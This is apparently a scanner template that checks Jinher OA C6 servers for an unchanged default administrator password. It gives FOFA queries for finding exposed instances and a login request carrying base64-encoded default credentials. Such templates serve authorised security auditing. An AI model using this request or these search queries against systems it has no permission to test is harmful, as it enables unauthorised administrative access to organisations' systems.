id: jinher-oa-c6-default-password

info:
    name: Jinher OA C6 Default Password
    author: iak3ec(https://github.com/nu0l)
    severity: high
    verified: true
    description: |
      fofa: app="金和网络-金和OA" 
      fofa: body="src=\"/c6/WebResource.axd"

rules:
  r0:
    request:
      method: POST
      path: /c6/Jhsoft.Web.login/AjaxForLogin.aspx
      body: type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&
    expression: response.status == 200 && response.body.bcontains(b'OK|管理者|系统管理员|')
expression: r0()

